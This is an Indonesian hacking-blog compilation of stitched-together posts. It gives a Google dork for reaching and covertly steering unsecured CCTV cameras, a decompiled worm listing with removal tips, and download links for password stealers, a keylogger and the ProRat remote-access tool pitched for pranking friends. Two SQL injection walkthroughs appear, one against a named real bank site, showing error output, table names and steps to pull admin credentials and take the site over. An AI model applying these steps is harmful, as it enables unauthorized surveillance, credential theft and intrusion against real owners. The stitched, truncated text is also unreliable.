HACKING CCTV PANASONIC
awalnya sih hanya iseng pingin lihat cctv online punya DLLAJ dan kepolisian. eh ternyata disitusnya bukan yg real time tetapi direkam diserver kemudian baru diupload kewebsite. nah dari situlah saya pingin langsung dapetin gambar secara real time tanpa harus masuk kesebuah website.
setelah googling sana sini dapat beberapa ip cctv yang memang sudah di publish sama yg bikin blog. cuma dipikir pikir kok cuma sedikit. jadi ga puas deh.
nah untuk lebih jelasnya simak caranya sebagai berikut :
1. ketikan di google ==> inurl:CgiStart?page=
2. biasanya google akan merespon anda dengan lalulintas komunikasi yang tidak layak. dan disuruh memasukan kata kata tertentu. kamu ikuti saja. biasanya google akan meminta 2x verifikasi kata.
3. nah tara..... setelah melewati verifikasi dari google munculah banyak pilihan. pilih aja salah satu.
4. jreng.... munculah cctv target....
5. ada beberapa yg bisa kita ambil kendali termasuk digeser kanan dan kiri, atas serta bawah. tapi jangan ketahuan admin yah... bisa di ban ip kamu.
ok sekian tutorial hacking cctv online. gunakan dengan bijak yah
pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?
berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.
virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
push ebp
mov ebp,esp
sub esp,10
push ebx
push esi
xor ecx,ecx
xor esi,esi
push edi
mov dword ptr [ebp-0C],ecx
xor ebx,ebx
l00401101:
mov eax,ecx
cdq
push 0F
pop edi
idiv edi
mov byte ptr [ecx+00417DB0],cl
inc ecx
cmp ecx,00000100
mov al,[edx+00416FC4]
mov byte ptr [ecx+004182BF],al
jl 00401101
l00401191:
inc bx
mov eax,eax
or bx,ax
dec bl
ror cl,1C
dec eax
sub cx,ax
sub eax,00
inc eax
xor eax,ebx
not bl
neg bx
inc ebx
mov bx,bx
xor cl,al
sub eax,ecx
xor bl,F6
nop
inc esi
and esi,edi
movzx eax,byte ptr [esi+00417DB0]
add eax,[ebp-0C]
and eax,edi
mov dword ptr [ebp-0C],eax
lea eax,[eax+00417DB0]
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
mov cl,[esi+00417DB0]
xor byte ptr [eax],cl
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
movzx eax,byte ptr [eax]
movzx ecx,byte ptr [esi+00417DB0]
add eax,ecx
mov ecx,[ebp+08]
and eax,edi
mov dl,[eax+00417DB0]
mov eax,[ebp-08]
add eax,ecx
cmp dl,[eax]
mov byte ptr [00417A71],dl
mov dword ptr [ebp-10],eax
jnz 00401219
l00401211:
xor dl,dl
mov byte ptr [00417A71],dl
l00401219:
ror bx,19
not eax
sub al,00
or bx,ax
not ecx
and al,bl
sub bx,1B
ror cx,1B
add ax,cx
ror ecx,10
and cx,FF
add eax,000000B2
neg ecx
xor al,cl
or bl,1D
shl bl,12
sar bl,14
and ax,FFFF
and eax,ecx
not eax
dec ebx
or eax,ecx
not cl
ror bx,02
shl ebx,03
or eax,00
shl bl,1B
ror bl,0D
sub al,00
xor cx,ax
ror ecx,1C
or eax,00
add al,00
not ecx
inc cl
not bx
inc bx
sar bl,17
ror cl,04
nop
ror cx,05
and ecx,09
ror ebx,15
xor bl,cl
inc ecx
sub eax,00
shl cx,06
and bl,al
inc bx
or bx,00
inc eax
ror bl,10
shl bx,1B
and cx,0D
shl bx,04
shl cl,1A
and ecx,eax
neg bl
nop
inc ebx
and bl,FF
sar cx,13
ror bl,09
sub eax,ebx
ror ebx,19
add eax,3F
not bx
shl ax,13
dec bx
add al,cl
mov eax,[ebp-10]
xor byte ptr [eax],dl
inc dword ptr [ebp-08]
mov eax,[ebp-08]
cmp eax,[ebp-04]
jl 00401191
l004012EC:
mov ebx,[ebp+08]
l004012EF:
pop edi
pop esi
mov eax,ebx
pop ebx
leave
ret
fn004013C4()
mov edx,[004183CC]
push ebx
dec cl
inc bx
or bx,16
shl cx,15
neg ecx
or ax,bx
sub bl,DE
not ecx
ror cl,16
shl ax,1A
shl cx,0B
or eax,04
inc ebx
or eax,ebx
and eax,FF
inc cx
sar al,07
sub bl,cl
ror al,18
and bx,14
sub eax,00
shl bx,0B
and bl,06
add ebx,ecx
and bx,FF
or al,cl
push 00416F38
push edx
call dword ptr [00413014]
mov edx,eax
not ebx
neg eax
add bx,00
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
sub eax,07
and ecx,ebx
nop
shl al,16
ror eax,12
sub cl,02
ror bl,05
ror eax,02
or bx,02
sub bx,00
sar ebx,07
neg eax
xor eax,66
ror cl,1C
neg eax
inc cl
dec ecx
inc eax
and bl,cl
ror eax,0F
mov bl,bl
nop
shl eax,16
neg cl
inc bl
not eax
add ebx,3F
ror ecx,08
sub al,00
nop
shl ecx,09
sar bx,1A
ror bl,0F
and ecx,06
not cl
ror eax,08
not bl
shl eax,04
ror al,0E
sub bl,E7
add cx,62
or ecx,ebx
ror eax,02
and ebx,18
xor ecx,000000E0
or ax,bx
shl bl,10
xor eax,0000009A
sar ecx,13
neg ebx
ror bx,18
neg al
ror ebx,1C
neg ax
push dword ptr [esp+08]
call edx
pop ebx
ret
fn004014DE()
push ecx
push ebx
push ebp
push esi
push edi
mov edi,eax
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
push 00416FD4
call 004010EF
pop ecx
add bl,al
neg eax
xor cl,al
sub bx,00
shl al,14
not cx
mov eax,eax
or ecx,ebx
ror bl,1E
sub al,cl
xor ecx,ebx
sar al,0F
sub bx,0E
or bx,01
neg ax
not ebx
neg eax
add bx,00
push 00416D40
call 004010EF
pop ecx
ror bl,0B
and eax,11
push 00416D64
call 004010EF
pop ecx
inc ebx
dec bl
nop
not ebx
dec eax
neg eax
add eax,00
and eax,FF
and bx,14
add eax,ecx
sub ebx,00
or eax,00
neg cx
or ax,001A
mov bl,bl
xor eax,0000009E
inc cl
push 00416D88
call 004010EF
pop ecx
and cl,bl
add bl,91
shl ebx,14
sub ecx,00
xor ebx,ecx
ror al,01
neg bl
shl ax,1B
ror bx,02
dec bl
ror bl,17
or eax,14
sub al,00
ror ebx,09
neg eax
not bl
xor al,cl
shl eax,0E
push 00416DAC
call 004010EF
pop ecx
not cx
sar bl,01
dec cl
dec al
ror ecx,0F
or bl,cl
add cl,00
ror ecx,07
inc ebx
not eax
sub cx,bx
dec eax
sub eax,00
neg eax
sub cl,00
or bl,00
shl ebx,13
sub ax,bx
not ebx
inc bx
and al,bl
mov bx,bx
neg ecx
sub bx,cx
push 00416DD0
call 004010EF
mov dword ptr [esp],00416DF4
call 004010EF
mov ebp,00416F5C
push ebp
call 004010EF
mov esi,[00413018]
pop ecx
pop ecx
push 00416CB0
call esi
push 00416D1C
mov dword ptr [004183CC],eax
call esi
mov dword ptr [esp+10],eax
and ax,0001
sar bx,14
shl al,09
ror ecx,0B
or bl,00
dec bx
add ebx,ecx
neg eax
ror bl,17
not al
or cx,00
dec ax
ror bl,0E
inc al
push ebp
push dword ptr [004183CC]
call dword ptr [00413014]
mov dword ptr [00417D68],00000044
mov dword ptr [00417A90],00010007
cmp word ptr [edi],5A4D
mov dword ptr [004183C8],edi
jnz 00401773
l00401813:
add bx,cx
push esi
push ebp
call dword ptr [004184E0]
mov edi,eax
and bl,07
cmp edi,ebp
jnz 0040182B
l00401827:
xor ecx,ebx
jmp 00401852
l0040182B:
and cx,ax
push esi
push ebp
call dword ptr [004184DC]
mov dword ptr [004184F8],eax
inc bl
push edi
call dword ptr [004184E4]
mov dword ptr [004184FC],eax
and ecx,eax
mov al,01
jmp 00401854
l0040184F:
ror al,1D
l00401852:
xor al,al
l00401854:
pop edi
pop esi
pop ebp
pop ebx
ret
fn00401859()
push ebx
mov ebx,[004184E8]
push ebp
mov ebp,[004184EC]
push esi
push edi
push 00416CB0
call dword ptr [00413018]
mov esi,[00413014]
mov edi,eax
push 00416ECC
push edi
call esi
push 00416EF0
push edi
mov dword ptr [00417A88],eax
call esi
push 00416F14
push edi
mov dword ptr [004183C0],eax
call esi
test ebx,ebx
mov dword ptr [00417DAC],eax
push ebp
jz 004018B6
---------------------------------------------------------------
Hebatnya, akun Facebook yang di
infeksi oleh virus tidak mengalami perubahan
sama sekali. Bahkan tidak ada pop up FB Chat
yang terbuka. Yang dibutuhkan oleh virus ini
hanyalah akun Facebook tersebut sedang login
saja. Kemungkinan besar hal ini terjadi supaya
korban virus tidak menyadari kalau komputernya
telah terinfeksi oleh Kolab/Click1 dan
menyebarkan banyak sekali FB Chat ke
kontak-kontak Facebooknya yang mengarahkan
untuk mendownload virus ini.
Jika Anda
meng-klik link pada pesan chat tersebut, maka
secara otomatis file akan terdownload ke dalam
komputer Anda. Dan jika Anda menjalankan file
tersebut, maka komputer Anda sudah pasti telah
terinfeksi.
Sulit dibasmi
dan menyebabkan BSOD (Bumi Serpong Ooo
Damai ??.. :p)
Kolab/Click1 tidak berjalan pada proses atau
services Windows, sehingga sulit menemukan dan
mematikan keberadaan worm/rootkit ini. Tetapi,
worm ini justru mendompleng atau menumpang
pada file svchost.exe milik Windows, sehingga
Anda akan sulit mematikan-nya. Jika Anda
memaksa mematikan file svchost.exe, komputer
akan mengalami blue
screen of death / BSOD. Termasuk jika Anda mencoba
melakukan scan menggunakan tools tertentu
seperti GMER, tools yang biasa digunakan untuk
mendeteksi rootkit. (lihat gambar 6)
Gambar 6,
Berusaha mematikan file svchost yang telah
didompleng, akan muncul BSOD
Broadcast ke
IP-IP tertentu
Walaupun tidak berjalan pada
proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe
Windows, untuk melakukan broadcast pada IP-IP
tertentu. (lihat gambar 7)
Gambar 7,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Mencantumkan
diri-nya pada Windows Firewall
Agar dapat berjalan bebas tanpa
hambatan, Kolab/Click1 mendaftarkan programnya pada
Windows Firewall, sehingga diperbolehkan untuk
melakukan koneksi dan broadcast. (lihat gambar
8)
Gambar 8,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Tips Hindari Kolab/Click1
Berikut beberapa tips bagi Anda
jika tidak ingin terinfeksi dan menjadi korban
dari worm/rootkit ini
Hindari melakukan klik pada
link yang dikirim pada Anda, baik melalui
pesan chat FB atau status.
Beritahukan pada teman Anda,
bahwa komputer tersebut telah terinfeksi
virus, dan segera lakukan update dan scan
komputer dengan antivirus yang terupdate.
Jangan melakukan copy link atau melakukan
pemberitahuan disertai link tersebut,
karena dengan begitu Anda justru ikut
menyebarkan link yang mengandung virus
tersebut.
Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
Gunakan Secure HTTP / HTTPS
pada saat Login FB, hal ini agar FB Anda
tidak mudah diakses oleh orang lain
disekitar Anda.
Apa yang harus dilakukan jika sudah terlajur terinfeksi?
Apabila
kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer
yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa
kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa
melakukan beberapa langkah berikut:
Tutup
akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah
penyebaran lebih banyak ke teman-teman facebook kita.
Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari
beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat
facebook ini merupakan varian terbaru dari worm kolab (worm jaringan)
yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.
Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.
Memang Virus Ramnit adalah Virus yang sangat cepat penularannya , tetapi bagaimanapun hebatnya sesuatu pasti ada kelemahannya….
Disini saya akan menjelaskan dengan tuntas bagaimana Virus ramnit bekerja… sekaligus cara mengatasinya…
Virus Ramnit.. :
Virus yang menginjeksi file .html , .exe dan .dll
Virus yang menular melalui removable disk ( UFD ) dengan cara mengcopy file .cpl dan .exe yang selalu bertambah dan berubah-ubah namanya.Yang tepatnya file tersebut berada di dalam folder Recycler… dan 4 file shortcut copy of yang akan menjalankan file *.cpl infektor yang terdapat di folder recycler UFD.
Bila Virus tersebut telah meng-infeksi system komputer , virus tersebut akan membuat dan menjalankan file svchost.exe yang akan melakukan berbagai hal: a. membuat file bernama : watermark.exe yang bertempat di folder : C:\programfiles\mikrosoft\watermark.exe. b. merubah registry userinit.exe mejadi menjalankan : watermark.exe , sehingga virus tersebut menguasai sistem secara permanen , dengan cara menginfeksi file berekstensi .exe , . dll dan .html
Jika di properties , UFD akan terlihat banyak terpakai oleh file .cpl dan .exe di folder recycler.
Efeknya:
Virus ramnit akan membuat file program tidak berjalan dengan normal , misalnya: mozilla firefox , winamp dll
kita tidak bisa menghapus file watermark.exe yang ada difolder c:\programfiles\microsoft\watermark.exe , dikarenakan file tersebut dikunci oleh file svchost.exe-nya virus ramnit.
bila kita hapus file / folder yang ada didalam folder recycler UFD , file .cpl dan .exe akan muncul kembali.. dan terus menulis kembali…
untuk system yangtelah terinfeksi file tertentu.. misalnya : explorer.exe akan digantikan explorermgr.exe
bila kita membersihkan virus ini tidak tuntas ( ada yang belum dibersihkan ) , Virus ini akan kembali bila kita menjalankan aplikasi ( misalnya : klik kanan ).
Cara membersihkannya:
Siapkan cleaner Anti Virus ( saya menggunakan NOD32 stand alone ) dengan cara >download disini< dan simpan dalam bentuk file zip / RAR agar file exe tersebut tidak terinfeksi virus.
Simpan file tersebut di UFD atau copy paste di harddisk komputer yang telah terinfeksi.
Gunakan task manager , pilih task / tab processes dan end task semua file svchost.exe dan juga semua yang bisa di end task ( kecuali : task managernya )
Open file cleaner NOD32 yang sudah berbentuk zip /RAR , dengan menggunakan file open di task manager.Rubah pilihan program di open file menjadi allfiles agar file zip / rar dari NOD32 bisa terlihat.
setelah teropen NOD32 dengan winrar atau aplikasi lainnya.. silakan dobel klik file nod*.exe setelah next…next dipilihan action , sebelah kiri pilih Clean dan sebelah kanan pilih delete.Lalu jalankan Scan & clean
setelah berjalan close / tutup winrar / aplikasi yang dibuat membuka NOD32 zip / RAR.
Silakan diawasi dengan task manager bila ada file svchost.exe keluar / tampil di processes segera di end task… dan seperti biasa bila ada tampilan windows yang memperingatkan bahwa komputer akan shutdown dalam waktu 60 detik / 1 menit…. silakan ketik di menu file open /run : shutdown -a yang artinya -a adalah perintah shutdown untuk membatalkan aksinya…
Peringatan!!!!! , disaat NOD 32 membersihkan file di komputer anda , jangan sampai membuka / menjalankan file apapun… karena jangankan menjalankan file exe , kita klik kanan aja sudah berarti menjalankan virus / svchost.exe-nya Virus Ramnit.
Ingat… yang perlu kita jaga adalah : mematikan / end task file svchost.exe selama NOD32 membersihkan file di komputer kita…..
Antisipasi Virus RAmnit:
Untuk menjaga Virus sejenis ramnit agar tidak kembali meng-infeksi komputer kita… disini saya sertakan berbagai trik… diantaranya:
Matikan autorun.inf windows bisa berbagai macam cara : dengan menggunakan gpedit.msc>>administrative template>>turn off auto play>>enable>>alldrive , atau menggunakan regedit silakan baca : agar virus tidak masuk melalui flash disk
Rubah beberapa ektensi file yang berpotensi digunakan oleh virus dengan assosiasi file ( misalnya: assoc .vbs=txtfile ) terutama untuk Virus ramnit adalah ekstensi .cpl
Hapus selalu folder recycler didalam UFD , bila tidak bisa ada kemungkinan komputer kita terinfeksi Virus…
Dan hapus dengan menggunakan mini windows Xp ( hiren BOOt CD ) atau system berbasis linux , folder recycler dan _restore yang ada di folder systeminformation
Install Anti virus dengan Update database terbaru… dan usahakan anti viru tersebut diupdate databasenya.. baik secara online ataupu offline..
Disini saya sertakan beberapa file buatan saya yang berfungsi untuk mempermudah setting windows…
Untuk yg sdah mengenal dunia deface mungkin tutorial ni sangatlah tidak asing lagi...B Tapi bwat yang newbie mungkin ini sangat bermanfaat....silahkan disedot video'y tutor'y
Pernah dengar tentang program mata mata yang biasa dipakai oleh FBI dan agen rahasia lainya?
berikut ini akan saya berikan 2 buah program mata mata (spy)
1. pasword fox, program ini akan menunjukan semua jenis pasword yang terekam pada firefox. cara kerjanya yaitu anda tinggal klik file aplikasinya maka program ini akan otomatis mencari pasword dari user yang pernah menggunakan firefox tersebut. berhati hatilah jika ada teman kamu yang pinjam laptopmu. bisa jadi di flashdisknya ada program ini. karena programnya yg portabel sehingga dapat disimpan di FD dan tinggal dijalankan saja.
2. google pasword decripter, program ini juga hampir sama dengan yang diatas hanya ada 2 macam yg portabel dan non portabel.
program diatas sangat berbahaya dan saya tidak bertanggungjawab atas pemakaian oleh orang yang tidak bertanggung jawab.
saran saya jangan pernah klik remember / ingat saya pada saat anda log in di sebuah website dengan user name dan paswordnya
oh iya ini saya masih punya 11 tools mata mata yang biasa dipakai oleh agen FBI dan agen rahasia lainya silahkan kalian pelajari sendiri heheheheh. males jelasinya kebayakan. silahkan download di : http://www.ziddu.com/download/15384974/11FBITools.rar.html
saya tidak bertanggung jawab atas pemakaian dan penggunaan program ini. jika anda memakai berarti anda paham akan resikonya
sudah pernah dengar keyloger ? yah program yang dapat merekam semua aktivitas yang kita lakukan. baik membuka program menulis email maupun mamasukan pasword dan program ini berjalan tanpa diketahui oleh pemilik komputer. berhati hatilah jangan sampai komputer kamu disisipi program ini karena semua rahasiamu akan terbongkarbagi yang ingin mencoba keyloger silahkan download di :http://www.ziddu.com/download/15384668/setup.exe.html
Bagi kamu yang suka iseng ngejahilin komputer teman, nih aku kasih tools yang cocok buat kamu. Namanya ProRat. ProRat adalah salah satu tool hacking yang sangat luar biasa sekali. Tools ini buatan orang Turkey. Tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban saja, maka kita dapat langsung menginfeksinya. Selamat mencoba download Disini
Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :
1. Menemukan target
Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.
N0LDR “Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”
Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):
Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010
Dari sekian banyak calon korban, maka: http://www.bankpapua.com/kantor.php?jenis=2 merupakan target saya pada tutorial sederhana ini.
N0LDR “Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”
2. Mencari celah kelemahan
Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.
(-) ditambahkan sebelum item pada query seperti berikut: http://www.bankpapua.com/kantor.php?jenis=-2 (‘) ditambahkan sesudah item pada query seperti berikut: http://www.bankpapua.com/kantor.php?jenis=2’
Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118
3. Mendapatkan jumlah kolom
Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:
http://www.bankpapua.com/kantor.php?jenis=2+order+by+1-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+2-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+3-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+4-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+5-- . . . Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118
Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)
4. Mendapatkan angka keberuntungan
Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:
[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.
5. Mendapatkan versi database server
Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:
Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.
6. Mendapatkan nama tabel
Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:
Kita mendapatkan nama-nama tabel sebagai berikut: adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga, galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz, polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:
http://www.dolcevie.com/js/converter.html
kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)
7. Mendapatkan nama kolom
Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:
0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut: ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.
8. Mendapatkan Data
Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:
Terenkripsi Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/
N0LDR “Tutorial ini hanya sebagai pembelajaran semata. Hacking is good” sumber : jasakom.com
Artikel Asli Berjudul Hack Website menggunakan SQL injection di www.perwira28.blogspot.com Under Creative Commons License: Attribution Non-Commercial
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D. Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.
Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D. Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci
inurl:news.php?id= site:com
Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test.. Misal kita menemukan sebuah site dengan alamat sebagai berikut….
http://www.target.com/english/news.php?id=64
Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut
http://www.target.com/english/news.php?id=-64+order+by+100– Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.
setelah ditulis kek gitu… ternyata terdapat error.. like this
Unknown column ‘100' in ‘order clause’
Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…
Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this
Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini
Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.
Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.
Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..
Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini
Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :) Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring
Dalam tulisan ini saya asumsikan anda menggunakan win 98 Sebelum kita mulai coba kita find nbtstat.exe Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip
Langkah langkah exploitasi :) 1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter 2. Click Start-->Run-->tulis nbtstat lalu OK
Kira kira mucul sperti ini : NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]
-a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe
Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu : -A -a
misal kita mau mencoba komputer dengan names belog.wasantara.net.id maka kita gunakan : nbtstat -a belog.wasantara.net.id
misal kita mau mencoba komputer dengan ip 192.168.1.1 maka kita gunakan : nbtstat -A 192.168.1.1
Dari perintah diatas kemungkinan yang muncul adalah : 1. Host not found 2. Dan pesan indah seperti dibawah ini :
--------------------------------------------
NetBIOS Local Name Table
